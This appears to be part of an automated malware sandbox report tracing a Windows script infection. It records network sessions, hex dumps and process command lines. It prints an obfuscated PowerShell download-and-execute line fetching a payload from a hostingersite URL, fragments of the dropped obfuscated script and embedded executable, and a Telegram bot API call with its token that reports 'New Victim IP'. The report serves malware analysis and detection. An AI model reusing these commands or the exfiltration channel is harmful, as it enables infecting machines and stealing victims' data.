                                                                                                                            2024-11-06 16:32:02 UTC549INData Raw: 5f 26 2d 2d 2d 2d 2d 26 6a 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 64 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6d 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 65 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 77 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6f 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 72 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 67 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 61 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 66 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 6e 5f 5f 5f 5f 25 5f 5f 5f 5f 79 76 26 2d 2d 2d 2d 2d 26 66 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 65 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 69 5f 5f 5f 5f 25 5f 5f 5f 5f 26 2d 2d 2d 2d 2d 26 75 5f 5f 5f 5f 25 5f
                                                                                                                            Data Ascii: _&-----&j____%____&-----&d____%____&-----&m____%____&-----&e____%____&-----&w____%____&-----&o____%____&-----&r____%____&-----&g____%____&-----&a____%____&-----&f____%____&-----&n____%____yv&-----&f____%____&-----&e____%____&-----&i____%____&-----&u____%_


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.94977784.32.84.1364437768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-06 16:32:11 UTC93OUTGET /moa/ HTTP/1.1
                                                                                                                            Host: honeydew-raven-308531.hostingersite.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-06 16:32:11 UTC444INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Wed, 06 Nov 2024 16:32:11 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.2.21
                                                                                                                            platform: hostinger
                                                                                                                            panel: hpanel
                                                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            x-hcdn-request-id: 0b156fc0c1b6c1742ce831ce096da7cc-int-edge3
                                                                                                                            x-hcdn-cache-status: DYNAMIC
                                                                                                                            x-hcdn-upstream-rt: 0.106
                                                                                                                            2024-11-06 16:32:11 UTC925INData Raw: 34 31 38 0d 0a 73 45 54 2d 69 54 65 6d 20 20 76 61 52 69 61 42 6c 45 3a 61 36 70 20 28 20 5b 74 79 70 65 5d 28 22 7b 32 7d 7b 31 7d 7b 30 7d 22 20 2d 66 20 27 45 27 2c 27 2e 46 69 6c 27 2c 27 49 4f 27 29 20 29 3b 20 20 24 7b 44 7d 20 3d 20 20 28 28 28 22 7b 32 7d 7b 35 7d 7b 34 7d 7b 33 7d 7b 30 7d 7b 36 7d 7b 31 7d 22 20 2d 66 20 27 44 61 74 61 70 27 2c 27 75 61 6c 73 70 38 50 27 2c 27 43 27 2c 27 72 61 6d 27 2c 27 67 27 2c 27 3a 70 38 50 50 72 6f 27 2c 27 38 50 44 6f 63 75 6d 65 6e 74 73 70 38 50 56 69 73 27 29 29 2d 72 45 70 6c 41 63 45 28 5b 43 48 61 72 5d 31 31 32 2b 5b 43 48 61 72 5d 35 36 2b 5b 43 48 61 72 5d 38 30 29 2c 5b 43 48 61 72 5d 39 32 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: 418sET-iTem vaRiaBlE:a6p ( [type]("{2}{1}{0}" -f 'E','.Fil','IO') ); ${D} = ((("{2}{5}{4}{3}{0}{6}{1}" -f 'Datap','ualsp8P','C','ram','g',':p8PPro','8PDocumentsp8PVis'))-rEplAcE([CHar]112+[CHar]56+[CHar]80),[CHar]92)
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 7d 7b 33 7d 7b 32 7d 22 20 2d 66 27 72 69 74 65 27 2c 27 57 27 2c 27 6c 6c 54 65 78 74 27 2c 27 41 27 29 2e 49 6e 76 6f 6b 65 28 22 24 64 5c 56 63 54 75 72 6e 2e 76 62 73 22 20 2c 20 24 7b 43 4f 60 4e 60 54 45 6e 54 7d 29 0a 20 20 0a 20 20 0a 74 72 79 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 36 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 24 7b 43 4f 60 4e 74 60 65 4e 54 7d 20 3d 20 40 27 0a 40 65 63 68 6f 20 6f 66 66 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 63 6d
                                                                                                                            Data Ascii: }{3}{2}" -f'rite','W','llText','A').Invoke("$d\VcTurn.vbs" , ${CO`N`TEnT}) try { 6000 ${CO`Nt`eNT} = @'@echo off cm
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 23 26 26 32 30 23 23 26 26 36 33 23 23 26 26 36 31 23 23 26 26 36 45 23 23 26 26 36 45 23 23 26 26 36 46 23 23 26 26 37 34 23 23 26 26 32 30 23 23 26 26 36 32 23 23 26 26 36 35 23 23 26 26 32 30 23 23 26 26 37 32 23 23 26 26 37 35 23 23 26 26 36 45 23 23 26 26 32 30 23 23 26 26 36 39 23 23 26 26 36 45 23 23 26 26 32 30 23 23 26 26 34 34 23 23 26 26 34 46 23 23 26 26 35 33 23 23 26 26 32 30 23 23 26 26 36 44 23 23 26 26 36 46 23 23 26 26 36 34 23 23 26 26 36 35 23 23 26 26 32 45 23 23 26 26 30 44 23 23 26 26 30 44 23 23 26 26 30 41 23 23 26 26 32 34 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 35 30 23 23 26 26 34 35 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26
                                                                                                                            Data Ascii: #&&20##&&63##&&61##&&6E##&&6E##&&6F##&&74##&&20##&&62##&&65##&&20##&&72##&&75##&&6E##&&20##&&69##&&6E##&&20##&&44##&&4F##&&53##&&20##&&6D##&&6F##&&64##&&65##&&2E##&&0D##&&0D##&&0A##&&24##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&50##&&45##&&00##&&00##&&
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 32 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 38 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30
                                                                                                                            Data Ascii: &&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&20##&&00##&&00##&&08##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&0
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30
                                                                                                                            Data Ascii: &00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00##&&00
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 30 30 23 23 26 26 31 31 23 23 26 26 30 32 23 23 26 26 30 33 23 23 26 26 32 38 23 23 26 26 31 31 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 32 38 23 23 26 26 31 32 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 30 41 23 23 26 26 32 42 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 32 41 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 31 33 23 23 26 26 33 30 23 23 26 26 30 31 23 23 26 26 30 30 23 23 26 26 30 42 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 31 31 23 23 26 26 30 32 23 23 26 26 32 38 23 23 26 26 31 33 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 30 41 23 23 26 26 32 42 23 23 26 26 30 30 23
                                                                                                                            Data Ascii: 00##&&11##&&02##&&03##&&28##&&11##&&00##&&00##&&0A##&&28##&&12##&&00##&&00##&&0A##&&0A##&&2B##&&00##&&06##&&2A##&&00##&&00##&&00##&&13##&&30##&&01##&&00##&&0B##&&00##&&00##&&00##&&06##&&00##&&00##&&11##&&02##&&28##&&13##&&00##&&00##&&0A##&&0A##&&2B##&&00#
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 37 32 23 23 26 26 30 31 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 37 30 23 23 26 26 38 30 23 23 26 26 30 36 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 37 32 23 23 26 26 33 33 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 37 30 23 23 26 26 38 30 23 23 26 26 30 38 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 37 32 23 23 26 26 36 35 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 37 30 23 23 26 26 38 30 23 23 26 26 30 39 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 37 32 23 23 26 26 39 37 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 37 30 23 23 26 26 38 30 23 23 26 26 30 41 23 23
                                                                                                                            Data Ascii: 0##&&00##&&00##&&00##&&00##&&00##&&72##&&01##&&00##&&00##&&70##&&80##&&06##&&00##&&00##&&04##&&72##&&33##&&00##&&00##&&70##&&80##&&08##&&00##&&00##&&04##&&72##&&65##&&00##&&00##&&70##&&80##&&09##&&00##&&00##&&04##&&72##&&97##&&00##&&00##&&70##&&80##&&0A##
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 23 23 26 26 38 30 23 23 26 26 30 41 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 37 45 23 23 26 26 30 43 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 32 38 23 23 26 26 35 31 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 32 38 23 23 26 26 32 32 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 38 30 23 23 26 26 30 43 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 37 45 23 23 26 26 30 44 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 32 38 23 23 26 26 35 31 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 32 38 23 23 26 26 32 32 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 38 30 23 23 26 26 30 44 23 23 26
                                                                                                                            Data Ascii: ##&&80##&&0A##&&00##&&00##&&04##&&7E##&&0C##&&00##&&00##&&04##&&28##&&51##&&00##&&00##&&06##&&28##&&22##&&00##&&00##&&0A##&&80##&&0C##&&00##&&00##&&04##&&7E##&&0D##&&00##&&00##&&04##&&28##&&51##&&00##&&00##&&06##&&28##&&22##&&00##&&00##&&0A##&&80##&&0D##&
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 23 26 26 32 38 23 23 26 26 32 31 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 37 45 23 23 26 26 31 30 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 32 44 23 23 26 26 30 41 23 23 26 26 32 38 23 23 26 26 32 38 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 32 38 23 23 26 26 31 41 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 37 45 23 23 26 26 31 36 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 34 23 23 26 26 36 46 23 23 26 26 32 43 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 32 36 23 23 26 26 31 37 23 23 26 26 32 44 23 23 26 26 43 38 23 23 26 26 32 41 23 23 26 26 43 36 23 23 26 26 31 36 23 23 26 26 38 30 23 23 26 26 31 30 23 23 26 26 30 30 23 23 26 26
                                                                                                                            Data Ascii: #&&28##&&21##&&00##&&00##&&0A##&&7E##&&10##&&00##&&00##&&04##&&2D##&&0A##&&28##&&28##&&00##&&00##&&06##&&28##&&1A##&&00##&&00##&&06##&&7E##&&16##&&00##&&00##&&04##&&6F##&&2C##&&00##&&00##&&0A##&&26##&&17##&&2D##&&C8##&&2A##&&C6##&&16##&&80##&&10##&&00##&&
                                                                                                                            2024-11-06 16:32:12 UTC1369INData Raw: 26 26 32 33 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 32 38 23 23 26 26 32 35 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 44 45 23 23 26 26 30 30 23 23 26 26 31 31 23 23 26 26 30 36 23 23 26 26 31 37 23 23 26 26 44 36 23 23 26 26 31 33 23 23 26 26 30 36 23 23 26 26 31 31 23 23 26 26 30 36 23 23 26 26 31 31 23 23 26 26 30 37 23 23 26 26 38 45 23 23 26 26 42 37 23 23 26 26 33 32 23 23 26 26 43 39 23 23 26 26 32 42 23 23 26 26 30 37 23 23 26 26 30 36 23 23 26 26 32 38 23 23 26 26 31 42 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 36 23 23 26 26 32 36 23 23 26 26 44 45 23 23 26 26 30 45 23 23 26 26 32 35 23 23 26 26 32 38 23 23 26 26 32 33 23 23 26 26 30 30 23 23 26 26 30 30 23 23 26 26 30 41 23 23 26 26 30
                                                                                                                            Data Ascii: &&23##&&00##&&00##&&0A##&&28##&&25##&&00##&&00##&&0A##&&DE##&&00##&&11##&&06##&&17##&&D6##&&13##&&06##&&11##&&06##&&11##&&07##&&8E##&&B7##&&32##&&C9##&&2B##&&07##&&06##&&28##&&1B##&&00##&&00##&&06##&&26##&&DE##&&0E##&&25##&&28##&&23##&&00##&&00##&&0A##&&0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.949834104.26.12.2054437768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-06 16:32:23 UTC170OUTGET /?format=text HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: api.ipify.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-06 16:32:23 UTC398INHTTP/1.1 200 OK
                                                                                                                            Date: Wed, 06 Nov 2024 16:32:23 GMT
                                                                                                                            Content-Type: text/plain
                                                                                                                            Content-Length: 14
                                                                                                                            Connection: close
                                                                                                                            Vary: Origin
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8de67ab3cc5abd52-ATL
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=20180&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=784&delivery_rate=143850&cwnd=32&unsent_bytes=0&cid=2d641396b1f7b1da&ts=207&x=0"
                                                                                                                            2024-11-06 16:32:23 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30
                                                                                                                            Data Ascii: 173.254.250.80


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.949840149.154.167.2204437768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-06 16:32:24 UTC292OUTPOST /bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Host: api.telegram.org
                                                                                                                            Content-Length: 55
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-06 16:32:24 UTC55OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 37 31 35 36 37 31 34 32 30 26 74 65 78 74 3d 4e 65 77 2b 56 69 63 74 69 6d 2b 49 50 25 33 41 2b 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30
                                                                                                                            Data Ascii: chat_id=-715671420&text=New+Victim+IP%3A+173.254.250.80
                                                                                                                            2024-11-06 16:32:25 UTC388INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Wed, 06 Nov 2024 16:32:24 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 336
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-11-06 16:32:25 UTC336INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 38 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 32 33 37 33 33 33 34 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 30 78 70 75 74 74 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 70 75 74 74 79 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 37 31 35 36 37 31 34 32 30 2c 22 74 69 74 6c 65 22 3a 22 58 59 5a 20 4f 4e 20 46 49 52 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 39 31 30 37 34 34 2c 22 74 65 78 74 22 3a 22 4e 65 77
                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":10877,"from":{"id":7023733342,"is_bot":true,"first_name":"0xputty","username":"xputty_bot"},"chat":{"id":-715671420,"title":"XYZ ON FIRE","type":"group","all_members_are_administrators":true},"date":1730910744,"text":"New


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:11:31:59
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FmmYUD4pt7.wsf"
                                                                                                                            Imagebase:0x7ff615f10000
                                                                                                                            File size:170'496 bytes
                                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:11:32:02
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='zalooma(''https://honeydew-raven-308531.hostingersite.com/moa/'')'.RePLACe('zalooma','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:11:32:02
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:11:32:23
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Documents\Visuals\VcTurn.vbs"
                                                                                                                            Imagebase:0x7ff615f10000
                                                                                                                            File size:170'496 bytes
                                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:11:32:23
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Documents\Visuals\VcEffect.bat" "
                                                                                                                            Imagebase:0x7ff6e0c20000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:11:32:23
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:11:32:23
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
                                                                                                                            Imagebase:0x7ff6e0c20000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:11:32:23
                                                                                                                            Start date:06/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Documents\Visuals\VcTurnOff.ps1"
                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 13172 7ff886c48924 13173 7ff886c4892d LoadLibraryExW 13172->13173 13175 7ff886c489dd 13173->13175

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FF886D035D9 Relevance: .9, Instructions: 944COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
